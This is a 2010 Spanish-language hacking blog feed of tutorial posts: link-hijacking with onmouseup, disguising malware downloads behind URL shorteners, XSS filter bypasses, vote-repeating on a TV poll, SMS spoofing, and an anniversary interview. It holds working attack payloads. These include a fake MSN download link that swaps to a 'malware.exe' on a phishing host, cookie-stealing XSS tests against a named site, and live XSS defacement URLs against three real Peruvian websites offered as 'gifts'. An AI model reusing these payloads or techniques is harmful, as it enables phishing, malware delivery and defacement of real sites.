tag:blogger.com,1999:blog-87192461011469268762010-08-01T19:57:40.129-07:00El Blog del Dr.White - Seguridad Informática PerúHacking, Seguridad Informática Perú, Sql Injection, Blind Sql Injection, Seguridad Web, Test de Intrusión, Pentest, Auditorías de Seguridad, Programación, Ethical Hacking y mucho mas.Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.comBlogger400125seguridadblancahttp://feedburner.google.comtag:blogger.com,1999:blog-8719246101146926876.post-45408218566402406182010-07-31T21:33:00.000-07:002010-07-31T22:35:10.314-07:002010-07-31T22:35:10.314-07:00Confiar en la barra de estado?El Javascript puede ser un arma increíble y les quiero demostrar como podríamos usar un ataque usando this.href y onmouseup...<br /><br /><br />Bueno empezemos por recordar como ponemos los links en html y los eventos que tenemos... en principio un simple link de afiliación a seguridadblanca...<br /><br /><br />&lt;a href=&quot;http://www.seguridadblanca.org&quot;&gt;SeguridadBlanca&lt;/a&gt;<br /><br />listo y como html debe quedar algo como:<br /><br /><a href="/index.html">SeguridadBlanca</a><br /><br />pero... por que siempre hay un pero cuando tu das un click hay dos eventos principales:<br /><br /><br />Apretar Boton del Mouse<br /><br />Soltar Boton del Mouse<br /><br /><br />No se me pongan con que ya se html... yo se que saben pero... ahora va a venir la parte interesante...<br /><br />asi como este tutorial hay varios sinceramente esta tecnica me di cuenta en un foro... vi que daba click pero siempre me cambiaba la url cuando era un link y busqué la respuesta y llegué a un tutorial pero este que estoy haciendo usa una técnica que es un poco mas difícil de detectar... de esto se darán cuenta durante el tutorial...<br /><br /><br />cuando teniamos el anterior link el de seguridadblanca si ustedes ponen el mouse sobre el link en la barra de estado del navegador saldrá www.seguridadblanca.org y cuando dan click los lleva a www.seguridadblanca.org pero... con algunas de las funciones que tiene el mismo a href combinado con un poco de javascript podríamos hacer que refireccione a otro lugar... observen:<br /><br />&lt;a href=&quot;http://www.google.com.pe/&quot; onclick=&quot;this.href=&#039;http://www.seguridadblanca.org&#039;&quot;&gt;google.com&lt;/a&gt;<br /><br />nuestro lindo codigo hace que todo se vea como si al dar click fuesemos a google.com.pe pero nah con la ayudita de nuestro javascript tan querido usando el this.href hemos logrado que al dar click (onclick) nos lleve a seguridadblanca.org porfavor... veamoslo en accion.<br /><br /><a href="http://www.google.com/" onclick="this.href='/index.html'">google.com</a><br /><br />Ahora se dan cuenta lo que pasó?... lo podemos hacer mas peligroso aun... en la mayoría de los tutoriales usan este ejemplo pero en vez de onclick usan onmousedown sin embargo asi fue como detecté yo el error en el foro que les contaba anterior mente... porfavor... vamos a hacer lo siguiente...<br /><br />&lt;a href=&quot;http://www.google.com/&quot; onmousedown=&quot;this.href=&#039;http://www.seguridadblanca.org&#039;&quot;&gt;google.com&lt;/a&gt;<br /><br />usando el anterior ejemplo quiero que vean la situacion real...<br /><br /><a href="http://www.google.com/" onmousedown="this.href='/index.html'">google.com</a><br /><br />si le dan click los llevará a SeguridadBlanca pero... quiero que presten atención a algo... apreten el mouse sobre el link pero no suelten...y luego arrastren el link hacia cualquier lado donde no se pueda pegar es decir unos centimetros a la derecha o izquierda y luego suelten... ahora pongan su mouse sobre el link... :O si señores... se ve el link de seguridadblanca.org ha fallado nuestro intento de engañar al usuario... por que? porque el evento onmousedown() fue ejecutado... al nosotros dar click haya sido sin soltarlo se ejecuto el momento...<br /><br />pero... cambiando la palabra down por la palabra UP podríamos cambiar todo el asunto...<br /><br />&lt;a href=&quot;http://www.google.com/&quot; onmouseup=&quot;this.href=&#039;http://www.seguridadblanca.org&#039;&quot;&gt;google.com&lt;/a&gt;<br /><br />listo ese es el codigo ahora veamoslo en acción quisiera que hagan lo mismo pero con el link de abajo...<br /><br /><a href="http://www.google.com/" onmouseup="this.href='/index.html'">google.com</a><br /><br />no paso nada... no cambio el statusbar sigue diciendo que el link nos llevará a google.com eso es por que el evento se ejecuta una vez que hayamos soltado el dedo el mouse cuando ya no hay marcha atras...<br /><br />algunos de ustedes dirán... y esto de que me sirve? pues... sirve de mucho mas que nada como somos de seguridad viendolo por el tema del BlacHat que sinceramente es lo mas divertido... imaginemos un acceso a una web muy visitada de messenger, faceboo y actualidad en general... y pones esto...<br /><br />&lt;a href=&quot;<br />http://g.live.com/1rewlive3/en/wlsetup-web.exe&quot; onmouseup=&quot;this.href=&#039;http://msn.phishing.org/malware.exe&#039;&quot;&gt;Descarga la Nueca Versi&oacute;n de MSN 100.0.0.0.2 xD&lt;/a&gt;<br /><br /><br />Cuantas victimas crees que abrían... eso sin contar que no hemos tocado htaccess para hacer un poco mas creibles las cosas...<br /><br /><br />Espero les haya gustado<br /><br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4540821856640240618?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com3tag:blogger.com,1999:blog-8719246101146926876.post-65286165891985782312010-07-06T18:55:00.000-07:002010-07-06T19:31:32.287-07:002010-07-06T19:31:32.287-07:00Peligrosidad de los acortadores de URL - ClickJacking? Url obfuscation?en Cholohack vi un post de esto y pensé que había sido un poco limitado... pues solo se hablo de los Xss en los acortadores de URL y esto es un poco mas extenso que esto...<br /><br /><br />el mencionó una situación bien peculiar en la que tu le mandabas una url acortada en la que los comentarios se hacian con un GET en php y el admin daba click y se ponia un commment...<br /><br /><br />CITA:<br /><br />- La víctima tiene un blog llamado http://blogdelavictima.com.<br /><br />- El blog de la víctima usa cookies, por lo tanto, puede ser que la cuenta de administrador del blog de la víctima está activa.<br /><br />- Cuando la víctima deja un comentario en el blog, se realizaría una petición así:<br /><br />“http://blogdelavictima.com/comentario.php?nickname=administrador&comentario=comentario”<br /><br />Si se le envía este URL con una trampita:<br /><br />http://vulnerable.com/index.html#name=&lt;script&gt;window.location=’http://blogdelavictima.com/comentario.php?nick=administrador&comentario=Hacked_By_Yourself<br />__________________<br /><br /><br /><br />bueno la cosa es que luego el comenta que que pasaría si acorta la url para engañar a la persona bueno... me parece un poco loco tener que ir hasta una url que sea vulnerable para meter javascript cuando simplemente mandandole http://blogdelavictima.com/comentario.php?nickname=administrador&comentario=comentario acortado lo haríamos... otra cosa muy distinta sería si hubiese que sacarle la cookie al admin... ahí sería de mucha utilidad poder usar el javascript para obtener el document.cookie pero no es el caso.<br /><br /><br />además... hoy les voy a mostrar una técnica de infección de malware con estos acortadores de url hoy en especial usaremos...<br /><br />http://ow.ly<br /><br />bueno miren vamos a acortar seguridadblanca.org...<br /><br />http://ow.ly/27Tx9<br /><br />:O excelente... se redirecciona rapidito y todo :)<br /><br />les quiero mostrar el bug que hay en este y otros acortadores... bit.ly muy usado tiene el mismo bug...<br /><br />quiero que vean esto...<br /><br />http://ow.ly/27Tx9?=http://www.facebook.com/photo.php?id=juerga2010<br /><br />Oh... por dios... se parece un link de facebook pero me sigue redirigiendo a www.seguridadblanca.org... pero que???? bueno en estos acortadores le pones ? y luego le clavas cualquier cosa y se ve como link pero te sigue llevando a la url del acortador...<br /><br />peligroso?<br /><br /><br />http://ow.ly/27TUF esa url es para bajarse el admin path finder un .rar...<br /><br />http://ow.ly/27TUF?http://www.facebook.com/photo.php?id=juerga20101<br /><br />denle click ;)<br /><br />se manda una peticion para que se descargue el admin path finder...<br /><br /><br />ahora solo imaginen esto...<br /><br /><br />www.malware.com/destroyer.exe... acortado y con un ?http://face.... que pasaría? cuanta gente caería?<br /><br /><br />Espero les haya gustado esta entrada ;) por cierto el tema de usar el acortador de url para defacear o hacer que el administrador ponga un post asi no es mala idea está muy bien cholohack no cometio un error pero creo que algo que si serviría sería usar los acortadores en un tutorial mas como <a href="/2009/09/robando_cookies_con_un_xss.html">este</a>.<br /><br /><br />una ves mas espero que les haya gustado.<br /><br /><br />PD: El título de Clickjacking es porque esto yo lo veo como clickjacking ya que podemos llenar nuetra webs de url acortadas y mmm este es un tema muy extenso de como explotarlo... esto también se puede tomar como obfuscación de url... hay muchas perspectivas...<br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-6528616589198578231?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com9tag:blogger.com,1999:blog-8719246101146926876.post-76534112396189308952010-07-04T16:34:00.000-07:002010-07-04T17:00:23.794-07:002010-07-04T17:00:23.794-07:00Ocultando errores en PHPNunca hice un post de esto pero la mayoría de personas hace este tutorial con htaccess el ocultar errores pero yo les voy a enseñar a hacerlo con php es muy simple...<br /><br />digamos que tenemso un FPD o Simplemente una SQLI que manda un warning... bueno tenemos lo siguientes archivos en el host...<br /><br />- index.php<br />- post.php<br />- noticia.php<br />- admin.php<br /><br />bueno la cosa es que para que no muestre los errores de \cms\noticia.php on line 23 y esas cosas hay una muy simple línea que podemos usar en PHP<br /><br /><code><br />&lt;?php<br /><br />error_reporting(0);<br /><br />?&gt;<br /></code><br /><br /><br />esto no repara el error, básicamente lo que hace es ocultarlo para los visitantes...<br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-7653411239618930895?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com24tag:blogger.com,1999:blog-8719246101146926876.post-1672665691216289012010-06-30T19:17:00.000-07:002010-06-30T19:33:22.514-07:002010-06-30T19:33:22.514-07:00Yo Voto 10 Veces por...Creo que la mayoría de peruanos está pegado en este show "El Gran Show" y pues todos quieren votar por su favorito en la web...<br /><br />http://www.elgranshow.com.pe/<br /><br />bueno hoy fui a votar por mi Favorito [Maicelo Corazon] me registré y... dije a ver... voy a usar mi SEAMONKEY :)<br /><br /><br />Quiero ver que pasa por los headers... entonces la hora de votar veo esto al poner repetir para analizar lo que se iva en el post...<br /><br /><br />POST /modules/mod_fly06_poll/assets/php/ajax.php HTTP/1.1<br /><br />Host: www.elgranshow.com.pe<br />User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; es-AR; rv:1.9.1.10) Gecko/20100504 SeaMonkey/2.0.5<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3<br />Accept-Encoding: gzip,deflate<br />Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />Keep-Alive: 300<br />Connection: keep-alive<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Referer: http://www.elgranshow.com.pe/index.php?option=com_content&view=frontpage&Itemid=1<br />Content-Length: 95<br />Cookie: 8e12d696a51e26j2h33l349634f4d10be10=4deb1908543fb079abjk2k3789600dd0; cbrvs=cbrv1_232d1df695592b2022c7e46248830f03_VkNSxz2QCkTx5kFu<br />Pragma: no-cache<br />Cache-Control: no-cache<br /><br />¿ENVIAR CONTENIDO POST?<br /><br />fp_id=1&fp_enable_ajax=1&fp_mod_id=76&fp_vote=1&fp_voteid=79&6f19f68b06dad926c216a5a0ec8afee7=1<br /><br /><br />Dije a ver que pasa si pongo repetir...<br /><br /><br />Mágicamente Volvi a votar...<br /><br />Creo que es trampa no?...<br /><br />entonces como saber en verdad quien es el favorito???<br /><br /><br />Vamos MAICELO Yo te apoyo... pero sin trampas...<br /><br /><br />Cual es el Problema?<br /><br />- No hay un filtro correcto al momento de votar...<br /><br />Repararlo?<br /><br />- Mejorar el sistema de Sessiones... si me contratan yo lo reparo :) - www.seguridadblanca.org<br /><br /><br />Exploit?<br /><br />- Con un simple CURL podríamos Explotar esto... en el blog (www.seguridadblanca.org) podemos enconrar un tuto de CURL para que ustedes mismos desarrollen uno si quieren...<br /><br /><br />Agradecimientos especiales a www.cholohack.com<br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-167266569121628901?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com5tag:blogger.com,1999:blog-8719246101146926876.post-86982563065572244562010-06-29T08:04:00.000-07:002010-06-29T17:30:10.354-07:002010-06-29T17:30:10.354-07:00Xss en formularios AJAX Mediante POSTTenemos una web que tiene mucho flash, entonces la vemos y decimos... flash no puede ser pero es AJAX y ahora como entramos o que bug encontramos si ni siquiera hay login, entonces usaremos nuestro live http headers para ver todo lo que se mueva...<br /><br />dan clicks he descubierto esto:<br /><br />http://www.webin.com/fabripiezas.php<br /><br />es un php donde hay puros archivos flash entonces me parece que aquí hay algo raro... por que usaría formato php si el flash lo puede poner en un simple html... entonces se me ocurre abrir mi seamonkey y correr el Live Http Headers a ver que encontramos...<br /><br />voy a dar un par de clicks al menu...<br /><br />que belleza... miren lo que dice mi live http headers...<br /><br />POST /listas.php HTTP/1.1<br /><br />Host: www.webin.com<br />User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; es-AR; rv:1.9.1.10) Gecko/20100504 SeaMonkey/2.0.5<br />Accept: text/html, */*<br />Accept-Encoding: gzip,deflate<br />Keep-Alive: 300<br />Connection: keep-alive<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Referer: http://www.webin.com/fabripiezas.php<br />Content-Length: 19<br />Pragma: no-cache<br />Cache-Control: no-cache<br /><br />¿enviar contenido post?<br /><br />idc=001001&amp;nu=1<br /><br /><br />a ver aver que bonito que pasará si cambio...<br /><br />nu=1<br /><br />por<br /><br />nu="&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br /><br />y ponemos repetir...<br /><br />se ejecuto que felicidad pero si queremos poner texto...<br /><br />nu="&gt;&lt;script&gt;alert('SB')&lt;/script&gt;<br /><br /><br />no se ejecuta... seguro hay filtro por eso como ya les he enseñado antes... se puede bypassear esto...<br /><br />es simple... con nuestro hackbar para aquellos que están en firefox es fácil pero bueno para mi que estoy en seamonkey... les recomiendo usar una tabla ascii...<br /><br />http://www.asciitable.com/<br /><br />y bueno ahora vemos lo que necesitamos... la S y la B y luego usamos el String FromCharcode que ya les he enseñado a usar antes...<br /><br /><br />nu="&gt;&lt;script&gt;alert(String.fromCharCode(83,66));&lt;/script&gt;<br /><br /><br />repetimos y listo :) ya está... usamos el texto SB que era lo que queríamos...<br /><br /><br />Espero les haya gustado el tutorial... ya que hay muchas webs que son vulnerables asi...<br /><br /><br />Pueden probar poniendo el ' para verificar capaz es vuln a SQLi también me ha tocado ver webs vulnerables de esa manera...<br /><br /><br />con eso verificamos que el FLASH te puede confundir y hacerte creer cosas que no son siendo un form en AJAX!<br /><br /><br />Saludos<br />Dr.White<br /><br /><br />PD: Si Alguien quiere colaborar con algo de dinero para gastos de SeguridadBlanca avise con un comentario. Gracias.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-8698256306557224456?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com2tag:blogger.com,1999:blog-8719246101146926876.post-27080409988911232112010-05-31T20:06:00.000-07:002010-05-31T20:08:36.626-07:002010-05-31T20:08:36.626-07:00Entrevista a Dr. White por aniversario de Seguridad-Blanca<p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Muy bien a raíz de el aniversario de seguridad blanca que cumple un año</b></p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal"><span style="mso-spacerun:yes"> </span>Decidí hacerle una entrevista a Camilo Galdos AKA Dr. White, el administrador del blog.</b></p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal"><span style="mso-spacerun:yes"> </span>que tal Camilo?</b></p> <p class="MsoNormal"><span style="mso-spacerun:yes">  </span><span style="mso-spacerun:yes"> </span>-chere</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Dime Camilo como nace el proyecto de seguridad blanca?</b></p> <p class="MsoNormal">Tenía ganas de compartir mi conocimiento conforme iba aprendiendo ya que veía que en los foros se repetía la información y no salían de Sqli, RFI y LFI; yo quería un lugar donde encontrar info mas allá de seguridad web así que me puse a leer y tratar de recopilar todo en un mismo lugar lo que llame SeguridadBlanca</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Antes de seguridad blanca tuviste otros proyectos <span style="mso-spacerun:yes"> </span>similares</b></p> <p class="MsoNormal">No, solo leía foros, en algún momento intenté iniciar con otro blog pero no me dieron los ánimos para seguir.</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Al iniciar seguridad blanca pensaste que se convertiría en uno de los blog de seguridad informática mas populares de la red</b></p> <p class="MsoNormal">Sinceramente no lo considero de los más populares de la red, lo considero pequeño sin intentar ser modesto pero si tengo los ánimos de que se haga conocido como otros que sigo, sin embargo pienso que no está tan mal para estar cumpliendo un año hoy día y cuando lo inicie la verdad tenía simplemente hacerlo como una biblioteca que visitara quien estuviera interesado y admito haberme sentido mal por tener tan pocos lectores en un principio porque sentía que todo lo hacía en vano pero mi recompensa eran los comentarios que decía Gracias Dr.White</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal"><o:p> </o:p></b></p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal"><span style="mso-spacerun:yes"> </span>Como elegiste el nombre <span style="mso-spacerun:yes"> </span>(seguridad blanca)</b></p> <p class="MsoNormal">Antes al igual que la mayoría andaba en el Black Hat y pues fue cuando decidí cambiar todo y ponerle Blanca como un cambio de Black a White Hat y Seguridad porque ya no quería ser un "hacker" sino alguien que sepa sobre seguridad... creo que eso fue...</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Como conseguiste el dinero para el dominio<span style="mso-spacerun:yes">  </span>XD</b></p> <p class="MsoNormal">jajajaja bueno... estaba en aprietos no es fácil decirle papa préstame plata pa mi dominio y hosting pues como la mayoría sabe dependo aun de mis viejos... entonces pedí dólares en mi salón de colegio dije un dólar para mi dominio plz un dólar para mi dominio plz y llegue a la suma querida y compre un mal dominio sin CNAME jajaja bueno y luego transferí con el dinero que me sobro...</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Consideras a seguridad blanca más que un blog?</b></p> <p class="MsoNormal">Pucha para mi... es un hijo... lo he visitado todos los días desde su creación... y ahora que cumple un año me siento muy muy orgulloso, cuando recién lo cree decía llegaré al año?... y casi se me derrumba por un ataque pero un pata me ayudo con lo moral y no me dejo abandonar el proyecto</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Que tipos de ataque a sufrido seguridad blanca</b></p> <p class="MsoNormal">Al poco tiempo de creada un ataque pobre me mandaron un mail falso desde blogger... queriendo que restablezca mi contraseña... y bueno, el otro fue por parte de uno de mis mejores amigos JBYTE a quien invite como escritor y la invitación no venció... entonces podía escribir cuando quisiera y me cambiaba el índex, me dolió mucho ya que lo consideraba mi amigo pero luego arreglamos las diferencias y admito el me ha ayudado mucho en lo que se refiere a seguridad informática.</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Cuantos cambios o evoluciones a sufrido seguridad blanca <span style="mso-spacerun:yes"> </span>y cuales son</b></p> <p class="MsoNormal">Bueno al principio no ponía tantos tutoriales propios sino que recopilaba luego cambie de theme y decidí poner algunos de mis códigos de programas y tutoriales pequeños, luego comenzó a poner más tutoriales luego compre el dominio y cambie de theme de nuevo y es como ahora es tutoriales y mas tutoriales los cuales me he esmerado en escribir y a veces he contado con ayuda como la que tengo ahora la cual aprecio mucho... Dr.Neox mi brother<span style="mso-spacerun:yes">  </span></p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Gracias XDD</b></p> <p class="MsoNormal"><span style="mso-spacerun:yes"> </span><b style="mso-bidi-font-weight: normal">Dime qué beneficios personales te a traído el blog, te ha ayudado a hacerte conocido en el mundo de la sec. <span style="mso-spacerun:yes"> </span>Informática</b></p> <p class="MsoNormal">bueno básicamente me ha traído algunas propuestas de trabajo de algunas empresas extranjeras y peruanas, me abrió las puertas para dar charlas en el curso OSEH y muchos más, por ahora no económicos ya que no fue un proyecto para ganar dinero aun que ciertamente creo que tendré que poner algún servicio ya que toca pagar el dominio pronto...</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">hahaha</b></p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal"><span style="mso-spacerun:yes"> </span>Dime haz conocido personas por tu blog</b></p> <p class="MsoNormal">Walter Cuestas de Open-Sec, Martin Lengua Olivares Administrador de CholoHack, puchas bastante gente pero a ellos dos personalmente y a través de ellos a más gente...</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">has ganado enemigos en seguridad blanca por motivos de envidia u otra cosa</b></p> <p class="MsoNormal">la verdad si, más de uno me ha dicho que soy un creído pero la verdad no tienen idea, los que realmente me conocen saben que yo no soy creído y que por el contrario me gusta compartir mi conocimiento... por eso abrí mi blog... no por hacerme conocido...y bueno no quiero dar nombres porque no es ético</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Tienes otros proyectos en mente¿?</b></p> <p class="MsoNormal">Bueno por ahora quiero sacar adelante a SeguridadBlanca y tengo en mente el hacer un software que de hecho ya lo estoy programando el cual nos ayudará con mi técnica favorita el Xss<span style="mso-spacerun:yes">   </span>no quiero dar más detalles pero en un tiempo saldrá mi tool... ya que no tengo tanto tiempo para programar por el colegio...</p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Algo más que quisieras agregar?</b></p> <p class="MsoNormal">Si quiero agregar saludos a la gente que ha colaborado con SeguridadBlanca... Dr.Neox, D4rkd3m0n, Jbyte, Perverths0, Backtracker, Martini, Wcuestas, Chelano, Zero_Bits, Vit0y4, Sebastián Burgos Mis Lectores y pucha si me olvido de alguien créanme que los tengo en mente... pero ahora se me han pasado.</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><b style="mso-bidi-font-weight:normal">Un saludo Dr. White y siga para adelante</b></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-2708040998891123211?l=www.seguridadblanca.org' alt='' /></div>Dr. NeoXhttp://www.blogger.com/profile/11815577640037617192noreply@blogger.com8tag:blogger.com,1999:blog-8719246101146926876.post-23112359383723016132010-05-31T16:06:00.000-07:002010-05-31T16:40:28.486-07:002010-05-31T16:40:28.486-07:00Feliz Cumpleaños SeguridadBlanca!!!!<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_112F2TUuD7w/TARDgwHytbI/AAAAAAAAADw/olFLc4jtP1w/s1600/felizcumple.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 420px; height: 450px;" src="http://4.bp.blogspot.com/_112F2TUuD7w/TARDgwHytbI/AAAAAAAAADw/olFLc4jtP1w/s200/felizcumple.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5477577276741825970" /></a><br />[denle click para verla mejor]<br /><br /><br /><br />No se como empezar esta entrada, Para mi SeguridadBlanca es como mi hijo/a simplemente quiero agradecer a todos los que me apoyaron en este proyecto, y quiero aprovechar para decirles todos los proyectos que tengo en mente para este año:<br /><br />- Seguir Poniendo Tutoriales ;)<br /><br />- Poner mas escritores capacitados para extendernos mas haya de Seguridad Informática...<br /><br />- Tengo Dos ideas de Software a desarrollar en mente, la información de uno de ellos saldrá la próxima.<br /><br />- Conseguir acercarme cada ves mas a blogs de habla hispana mas grandes, no menciono nombres porque ya se sabe cuales son.<br /><br /><br />Bueno con esto y 3 Xss de Regalo (no defaces solo Xss con un poco de javascript...)<br /><br /><a href="http://www.peru.com/cyberperiodista/login/login.aspx?r=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ccenter%3E%3Ch1%3ESeguridadBlanca.Org%20Feliz%20Aniversario%3Cbr%3ENunca%20Lo%20Olviden...Security%20is%20all%20about%20creativity%3C/h1%3E%22;%3C/script%3E">Xss Peru.com</a><br /><br /><a href="http://www.24horas.com.pe/envio.php?pagina=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ccenter%3E%3Ch1%3ESeguridadBlanca.Org%20Feliz%20Aniversario%3Cbr%3ENunca%20Lo%20Olviden...Security%20is%20all%20about%20creativity%3C/h1%3E%22;%3C/script%3E">Xss 24Horas.com.pe</a><br /><br /><a href="http://www.tuentrada.com.pe/show_search.asp?search=%3E%3Cscript%3Edocument.documentElement.innerHTML%3D%22%3Ccenter%3E%3Ch1%3ESeguridadBlanca.Org+Feliz+Aniversario%3Cbr%3ENunca+Lo+Olviden...Security+is+all+about+creativity%3C%2Fh1%3E%22%3B%3C%2Fscript%3E&area=0">Xss Tuentrada.com.pe</a><br /><br /><br />Ahora si... otra ves un super agradecimiento a todos quienes me han apoyado con seguridadblanca haya sido con una cachetada diciendome que mi blog es pésimo o haya sido alagandome diciendome que mi blog es bueno.... muchas gracias a todos... y espero que cumplamos muchos mas juntos!!!<br /><br /><br />Un Regalito de $400...<br /><br /><br /><img src="http://i49.tinypic.com/5urayp.gif" width="400" height="600" /><br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-2311235938372301613?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com10tag:blogger.com,1999:blog-8719246101146926876.post-43009703733920905302010-05-30T19:26:00.000-07:002010-05-30T20:04:09.069-07:002010-05-30T20:04:09.069-07:00ByPass Magic_Quotes_gpc to XssBueno, un poco de tiempo libre después de estudiar para mi examen de literatura me hicieron pensar en los Xss...lo sé es absurdo pero necesitaba introducción...<br /><br />Bueno resulta que hay veces que uno ve una variable asi:<br /><br />http://www.webvuln.com/busqueda.php?palabra=<br /><br />que tentador... un buscador... lo primero que pienso yo al ver un buscador es... google... pero aparte... XSS... asi que vamos a intentar explotarlo...<br /><br />vamos a buscar:<br /><br />"hola"<br /><br />si nos aparece el texto exacto estamos hechos... por que de hecho es vulnerable... pero que pasó... miren lo que nos voto...<br /><br />\"hola\"<br /><br />entonces lo que se me viene a la mente son dos cosas... hay un filtro... y el filtro puede ser Magic_Quotes_gpc() entonces... vamos a intentar bypassearlo de una manera muy sencilla que si tienen el <a href="https://addons.mozilla.org/es-ES/firefox/addon/3899">hackbar</a> todo es mas sencillo pero sino pues miren... esto se bypassea muy facil... podríamos usar:<br /><br />http://www.webvuln.com/busqueda.php?palabra="&gt;&lt;script&gt;alert("Dr.Neox & Dr.White")&lt;/script&gt;<br /><br />pero no nos va a dejar pes por que hay " nos va a chantar los \ asi que vamos a usar el HACKBAR... ponemos la URL con el boton Load URL luego ponemos Split URL y ya tenemos nuestra variable solita... ahora damos click donde está la variable borraos el contenido de la búsqueda y ponemos el boton XSS luego String.CharCode() luego nos va a saltar un inputbox (una cajita) y escribimos ahí lo que queremos... por ejemplo... en mi caso pondré alert("Dr.Neox & Dr.White")... ahora si... ponemos enter y voila...<br /><br />String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 68, 114, 46, 78, 101, 111, 120, 32, 38, 32, 68, 114, 46, 87, 104, 105, 116, 101, 34, 41)<br /><br />ahora en nuestra búsqueda pondremos lo siguiente y estamos listos...<br /><br />&lt;script&gt;String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 68, 114, 46, 78, 101, 111, 120, 32, 38, 32, 68, 114, 46, 87, 104, 105, 116, 101, 34, 41)&lt;/script&gt;<br /><br />y Salto nuestra cajita mágica... hemos bypasseado el filtro...<br /><br />espero les guste... ya que esto es viejo sin embargo es útil en muchas ocaciones...<br /><br />resultado total:<br /><br />http://www.webvuln.com/busqueda.php?palabra=&lt;script&gt;String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 68, 114, 46, 78, 101, 111, 120, 32, 38, 32, 68, 114, 46, 87, 104, 105, 116, 101, 34, 41)&lt;/script&gt;<br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4300970373392090530?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com5tag:blogger.com,1999:blog-8719246101146926876.post-41112523833622154122010-05-29T18:31:00.000-07:002010-05-29T18:47:23.423-07:002010-05-29T18:47:23.423-07:00SMS SpoofingImaginemos que un día nos llega un sms de un número el cual ya está asociado a nuestro móvil, nunca dudaríamos que el mensaje viene del celular de esta persona de la cual aparece su número , total es lo mas normal .<br />Pero imaginemos que el mensaje no viene de ese celular si no que fue falseado por un tercero?, piensan en las grandes posibilidades que podría dar esta especie de técnica?<br />Desde una simple broma hasta un fraude via SMS.<br />Pongámonos en el caso que nos llega un sms supuesta mente desde un numero de nuestra compañía de servicio móvil indicándonos llamar a un numero especifico por que “ganamos una promoción” , esta técnica con un poco de ingeniería social se podría usar para estafar y engañar usuarios incautos con supuestas promociones o hasta para hacer spam.<br />Bien como funciona esto?<br />Sabemos que los sms no van directamente de un celular a otro si no pasan por una serie de “GATEWAYS” los cuales también pueden almacenar nuestro SMS, en conclusión los SMS no tienen nada de seguro , y peor aun desde que las infraestructuras de las compañías para mandar SMS están conectadas a internet para poder mandar SMS desde ahí , los SMS no validan siempre de que móvil vienen , esto puede ser utilizado para falsificar SMS con algunos servicios disponibles en internet y hasta gratuitos como lo son:<br />Lleida.NET que te da algunos créditos de demo , comencemos con este servicio:<br />Una vez registrado en:<br />http://smsmasivo.lleida.net/es/alta.html<br />nos llegara al correo un mail con los datos de acceso los cuales tenemos que logarlos en:<br />http://websms.lleida.net/<br /><br />Que es la web desde donde mandaremos los sms<br /><br /><br /><img style="cursor:pointer; cursor:hand;width: 500px; height: 